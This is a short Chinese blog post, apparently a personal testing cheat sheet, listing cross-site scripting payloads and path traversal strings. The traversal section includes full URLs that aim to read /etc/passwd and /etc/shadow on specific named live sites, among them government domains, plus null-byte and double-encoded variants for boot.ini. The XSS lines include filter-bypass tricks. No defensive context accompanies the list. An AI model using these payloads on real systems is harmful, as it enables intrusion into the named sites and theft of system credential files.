测试

XSS

http://htmlpurifier.org/live/smoketests/xssAttacks.php

http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90

'';!--"<XSS>=&{()}

1  y=

<div style=width:expression(alert(/xss/))>

<div style=width:expression(prompt(937511))>

1%20onmouseover%3dprompt(920753)%20y%3d

<scr<script>ipt>alert(1)</scr<script>ipt>

<img src=d.jpg onerror=confirm(/xss/)>

style=width:expression(alert(/xss/))

<svg><s1cript>alert&#40/1/&#41</script>

―――――――――――――――――――

遍历

http://www.leaf520.com/bbs/viewtopic.php?f=53&t=441

http://www.ynjst.gov.cn:82/ghc/editor/down.jsp?path=../../../../../../../etc&file=shadow
http://cks.mof.gov.cn/crifs/content/docmanage/download.jspfilePath=../../../../../../../../etc/passwd/do=../../../../../../../../../../etc/passwd%00.jpg&mod=info&sort_id=6
http://www.kaixin001.com/records/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg-30.html
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg

本文出自 “无双城” 博客，谢绝转载！